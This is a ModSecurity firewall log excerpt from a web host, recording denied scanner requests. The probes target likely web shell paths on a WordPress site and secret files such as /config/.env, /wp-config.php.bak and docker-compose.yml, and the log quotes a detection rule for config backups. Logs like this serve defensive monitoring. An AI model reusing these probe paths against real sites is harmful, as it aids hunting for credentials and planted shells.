[Tue May 26 15:05:13.728951 2026] [security2:error] [pid 678998:tid 679199] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpUZ-Rl4i_pgT-iAdo0QAAAEc"]
[Tue May 26 15:05:14.698034 2026] [security2:error] [pid 678998:tid 679243] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpUp-Rl4i_pgT-iAdo-QAAAHM"]
[Tue May 26 15:05:14.861421 2026] [security2:error] [pid 678998:tid 679101] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/.env"] [unique_id "ahVpUp-Rl4i_pgT-iAdpCQAAAWY"]
[Tue May 26 15:05:14.996585 2026] [security2:error] [pid 678998:tid 679251] [client 20.9.81.163:55336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVpUp-Rl4i_pgT-iAdpEAAAAHs"]
[Tue May 26 15:05:14.996765 2026] [security2:error] [pid 678998:tid 679251] [client 20.9.81.163:55336] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVpUp-Rl4i_pgT-iAdpEAAAAHs"]
[Tue May 26 15:05:15.143212 2026] [security2:error] [pid 678998:tid 679238] [client 20.9.81.163:13630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/admin.php"] [unique_id "ahVpU5-Rl4i_pgT-iAdpGQAAAG4"]
[Tue May 26 15:05:15.143366 2026] [security2:error] [pid 678998:tid 679238] [client 20.9.81.163:13630] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/admin.php"] [unique_id "ahVpU5-Rl4i_pgT-iAdpGQAAAG4"]
[Tue May 26 15:05:15.266832 2026] [security2:error] [pid 678998:tid 679137] [client 20.9.81.163:8923] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/inputs.php"] [unique_id "ahVpU5-Rl4i_pgT-iAdpHQAAAAk"]
[Tue May 26 15:05:15.266936 2026] [security2:error] [pid 678998:tid 679137] [client 20.9.81.163:8923] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/inputs.php"] [unique_id "ahVpU5-Rl4i_pgT-iAdpHQAAAAk"]
[Tue May 26 15:05:15.415097 2026] [security2:error] [pid 678998:tid 679199] [client 20.9.81.163:31834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/file.php"] [unique_id "ahVpU5-Rl4i_pgT-iAdpIAAAAEc"]
[Tue May 26 15:05:15.415180 2026] [security2:error] [pid 678998:tid 679199] [client 20.9.81.163:31834] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/file.php"] [unique_id "ahVpU5-Rl4i_pgT-iAdpIAAAAEc"]
[Tue May 26 15:05:15.564578 2026] [security2:error] [pid 678998:tid 679207] [client 20.9.81.163:47632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/ms-edit.php"] [unique_id "ahVpU5-Rl4i_pgT-iAdpJAAAAE8"]
[Tue May 26 15:05:15.564707 2026] [security2:error] [pid 678998:tid 679207] [client 20.9.81.163:47632] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/ms-edit.php"] [unique_id "ahVpU5-Rl4i_pgT-iAdpJAAAAE8"]
[Tue May 26 15:05:15.670994 2026] [security2:error] [pid 678998:tid 679149] [client 136.243.220.209:65498] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpU5-Rl4i_pgT-iAdpLgAAABU"]
[Tue May 26 15:05:15.721220 2026] [security2:error] [pid 678998:tid 679155] [client 20.9.81.163:65065] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/simple.php"] [unique_id "ahVpU5-Rl4i_pgT-iAdpLwAAABs"]
[Tue May 26 15:05:15.721359 2026] [security2:error] [pid 678998:tid 679155] [client 20.9.81.163:65065] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/simple.php"] [unique_id "ahVpU5-Rl4i_pgT-iAdpLwAAABs"]
[Tue May 26 15:05:15.838225 2026] [security2:error] [pid 678998:tid 679145] [client 20.9.81.163:47649] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/bgymj.php"] [unique_id "ahVpU5-Rl4i_pgT-iAdpMAAAABE"]
[Tue May 26 15:05:15.838318 2026] [security2:error] [pid 678998:tid 679145] [client 20.9.81.163:47649] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/bgymj.php"] [unique_id "ahVpU5-Rl4i_pgT-iAdpMAAAABE"]
[Tue May 26 15:05:15.975659 2026] [security2:error] [pid 678998:tid 679156] [client 20.9.81.163:17254] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahVpU5-Rl4i_pgT-iAdpMQAAABw"]
[Tue May 26 15:05:15.975801 2026] [security2:error] [pid 678998:tid 679156] [client 20.9.81.163:17254] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahVpU5-Rl4i_pgT-iAdpMQAAABw"]
[Tue May 26 15:05:16.128685 2026] [security2:error] [pid 678998:tid 679213] [client 20.9.81.163:8951] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/404.php"] [unique_id "ahVpVJ-Rl4i_pgT-iAdpOAAAAFU"]
[Tue May 26 15:05:16.128785 2026] [security2:error] [pid 678998:tid 679213] [client 20.9.81.163:8951] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/404.php"] [unique_id "ahVpVJ-Rl4i_pgT-iAdpOAAAAFU"]
[Tue May 26 15:05:16.397202 2026] [security2:error] [pid 678998:tid 679233] [client 20.9.81.163:55329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/file3.php"] [unique_id "ahVpVJ-Rl4i_pgT-iAdpQgAAAGk"]
[Tue May 26 15:05:16.397320 2026] [security2:error] [pid 678998:tid 679233] [client 20.9.81.163:55329] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/file3.php"] [unique_id "ahVpVJ-Rl4i_pgT-iAdpQgAAAGk"]
[Tue May 26 15:05:16.599927 2026] [security2:error] [pid 678998:tid 679140] [client 20.9.81.163:48616] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-mail.php"] [unique_id "ahVpVJ-Rl4i_pgT-iAdpTQAAAAw"]
[Tue May 26 15:05:16.600024 2026] [security2:error] [pid 678998:tid 679140] [client 20.9.81.163:48616] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/wp-mail.php"] [unique_id "ahVpVJ-Rl4i_pgT-iAdpTQAAAAw"]
[Tue May 26 15:05:16.661251 2026] [security2:error] [pid 678998:tid 679105] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "adityacreations.co.in"] [uri "/wp-config.php.bak"] [unique_id "ahVpVJ-Rl4i_pgT-iAdpUAAACGo"]
[Tue May 26 15:05:16.747092 2026] [security2:error] [pid 678998:tid 679147] [client 20.9.81.163:55297] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/about.php"] [unique_id "ahVpVJ-Rl4i_pgT-iAdpZQAAABM"]
[Tue May 26 15:05:16.747212 2026] [security2:error] [pid 678998:tid 679147] [client 20.9.81.163:55297] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/about.php"] [unique_id "ahVpVJ-Rl4i_pgT-iAdpZQAAABM"]
[Tue May 26 15:05:16.870371 2026] [security2:error] [pid 678998:tid 679191] [client 20.9.81.163:48610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp.php"] [unique_id "ahVpVJ-Rl4i_pgT-iAdpagAAAD8"]
[Tue May 26 15:05:16.870490 2026] [security2:error] [pid 678998:tid 679191] [client 20.9.81.163:48610] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/wp.php"] [unique_id "ahVpVJ-Rl4i_pgT-iAdpagAAAD8"]
[Tue May 26 15:05:16.923551 2026] [security2:error] [pid 678998:tid 679209] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpVJ-Rl4i_pgT-iAdpRQAAAFE"]
[Tue May 26 15:05:17.010427 2026] [security2:error] [pid 678998:tid 679172] [client 20.9.81.163:17229] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/.dj/index.php"] [unique_id "ahVpVZ-Rl4i_pgT-iAdpcgAAACw"]
[Tue May 26 15:05:17.010504 2026] [security2:error] [pid 678998:tid 679172] [client 20.9.81.163:17229] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/.dj/index.php"] [unique_id "ahVpVZ-Rl4i_pgT-iAdpcgAAACw"]
[Tue May 26 15:05:17.130092 2026] [security2:error] [pid 678998:tid 679157] [client 20.9.81.163:55343] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/adminfuns.php"] [unique_id "ahVpVZ-Rl4i_pgT-iAdpdwAAAB0"]
[Tue May 26 15:05:17.130194 2026] [security2:error] [pid 678998:tid 679157] [client 20.9.81.163:55343] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/adminfuns.php"] [unique_id "ahVpVZ-Rl4i_pgT-iAdpdwAAAB0"]
[Tue May 26 15:05:17.283982 2026] [security2:error] [pid 678998:tid 679134] [client 20.9.81.163:59318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/php8.php"] [unique_id "ahVpVZ-Rl4i_pgT-iAdpfwAAAAY"]
[Tue May 26 15:05:17.284101 2026] [security2:error] [pid 678998:tid 679134] [client 20.9.81.163:59318] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/php8.php"] [unique_id "ahVpVZ-Rl4i_pgT-iAdpfwAAAAY"]
[Tue May 26 15:05:17.419434 2026] [security2:error] [pid 678998:tid 679137] [client 20.9.81.163:8919] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/classwithtostring.php"] [unique_id "ahVpVZ-Rl4i_pgT-iAdphwAAAAk"]
[Tue May 26 15:05:17.419534 2026] [security2:error] [pid 678998:tid 679137] [client 20.9.81.163:8919] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/classwithtostring.php"] [unique_id "ahVpVZ-Rl4i_pgT-iAdphwAAAAk"]
[Tue May 26 15:05:17.588265 2026] [security2:error] [pid 678998:tid 679142] [client 20.9.81.163:59306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/info.php"] [unique_id "ahVpVZ-Rl4i_pgT-iAdpjgAAAA4"]
[Tue May 26 15:05:17.588354 2026] [security2:error] [pid 678998:tid 679142] [client 20.9.81.163:59306] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/info.php"] [unique_id "ahVpVZ-Rl4i_pgT-iAdpjgAAAA4"]
[Tue May 26 15:05:17.725459 2026] [security2:error] [pid 678998:tid 679184] [client 20.9.81.163:59285] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/ioxi-o.php"] [unique_id "ahVpVZ-Rl4i_pgT-iAdpkgAAADg"]
[Tue May 26 15:05:17.725568 2026] [security2:error] [pid 678998:tid 679184] [client 20.9.81.163:59285] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/ioxi-o.php"] [unique_id "ahVpVZ-Rl4i_pgT-iAdpkgAAADg"]
[Tue May 26 15:05:17.842449 2026] [security2:error] [pid 678998:tid 679155] [client 20.9.81.163:26543] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/011i.php"] [unique_id "ahVpVZ-Rl4i_pgT-iAdpoQAAABs"]
[Tue May 26 15:05:17.842547 2026] [security2:error] [pid 678998:tid 679155] [client 20.9.81.163:26543] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/011i.php"] [unique_id "ahVpVZ-Rl4i_pgT-iAdpoQAAABs"]
[Tue May 26 15:05:17.961478 2026] [security2:error] [pid 678998:tid 679212] [client 20.9.81.163:57869] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/edit.php"] [unique_id "ahVpVZ-Rl4i_pgT-iAdppAAAAFQ"]
[Tue May 26 15:05:17.961616 2026] [security2:error] [pid 678998:tid 679212] [client 20.9.81.163:57869] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/edit.php"] [unique_id "ahVpVZ-Rl4i_pgT-iAdppAAAAFQ"]
[Tue May 26 15:05:18.092307 2026] [security2:error] [pid 678998:tid 679209] [client 20.9.81.163:13583] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/sid3.php"] [unique_id "ahVpVp-Rl4i_pgT-iAdppgAAAFE"]
[Tue May 26 15:05:18.092451 2026] [security2:error] [pid 678998:tid 679209] [client 20.9.81.163:13583] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/sid3.php"] [unique_id "ahVpVp-Rl4i_pgT-iAdppgAAAFE"]
[Tue May 26 15:05:18.323379 2026] [security2:error] [pid 678998:tid 679219] [client 20.9.81.163:31870] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/load.php"] [unique_id "ahVpVp-Rl4i_pgT-iAdpsAAAAFs"]
[Tue May 26 15:05:18.323498 2026] [security2:error] [pid 678998:tid 679219] [client 20.9.81.163:31870] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/load.php"] [unique_id "ahVpVp-Rl4i_pgT-iAdpsAAAAFs"]
[Tue May 26 15:05:18.411606 2026] [security2:error] [pid 678998:tid 679174] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpVZ-Rl4i_pgT-iAdppQAAAC4"]
[Tue May 26 15:05:18.527997 2026] [security2:error] [pid 678998:tid 679139] [client 20.9.81.163:55302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/166.php"] [unique_id "ahVpVp-Rl4i_pgT-iAdptQAAAAs"]
[Tue May 26 15:05:18.528122 2026] [security2:error] [pid 678998:tid 679139] [client 20.9.81.163:55302] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/166.php"] [unique_id "ahVpVp-Rl4i_pgT-iAdptQAAAAs"]
[Tue May 26 15:05:18.692445 2026] [security2:error] [pid 678998:tid 679187] [client 20.9.81.163:27826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/load.php"] [unique_id "ahVpVp-Rl4i_pgT-iAdptgAAADs"]
[Tue May 26 15:05:18.692594 2026] [security2:error] [pid 678998:tid 679187] [client 20.9.81.163:27826] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/load.php"] [unique_id "ahVpVp-Rl4i_pgT-iAdptgAAADs"]
[Tue May 26 15:05:18.836854 2026] [security2:error] [pid 678998:tid 679224] [client 20.9.81.163:13623] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/166.php"] [unique_id "ahVpVp-Rl4i_pgT-iAdpuQAAAGA"]
[Tue May 26 15:05:18.836982 2026] [security2:error] [pid 678998:tid 679224] [client 20.9.81.163:13623] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/166.php"] [unique_id "ahVpVp-Rl4i_pgT-iAdpuQAAAGA"]
[Tue May 26 15:05:18.913515 2026] [security2:error] [pid 678998:tid 679202] [client 165.140.119.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVpVZ-Rl4i_pgT-iAdpewAAAEo"], referer: https://www.bloggertarget.com
[Tue May 26 15:05:18.972560 2026] [security2:error] [pid 678998:tid 679177] [client 20.9.81.163:8922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-mail.php"] [unique_id "ahVpVp-Rl4i_pgT-iAdpvAAAADE"]
[Tue May 26 15:05:18.972705 2026] [security2:error] [pid 678998:tid 679177] [client 20.9.81.163:8922] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/wp-mail.php"] [unique_id "ahVpVp-Rl4i_pgT-iAdpvAAAADE"]
[Tue May 26 15:05:19.042387 2026] [security2:error] [pid 678998:tid 679123] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/docker-compose.yml"] [unique_id "ahVpV5-Rl4i_pgT-iAdpvwAAOHw"]
[Tue May 26 15:05:19.133516 2026] [security2:error] [pid 678998:tid 679216] [client 20.9.81.163:27826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/leaf.php"] [unique_id "ahVpV5-Rl4i_pgT-iAdpwAAAAFg"]
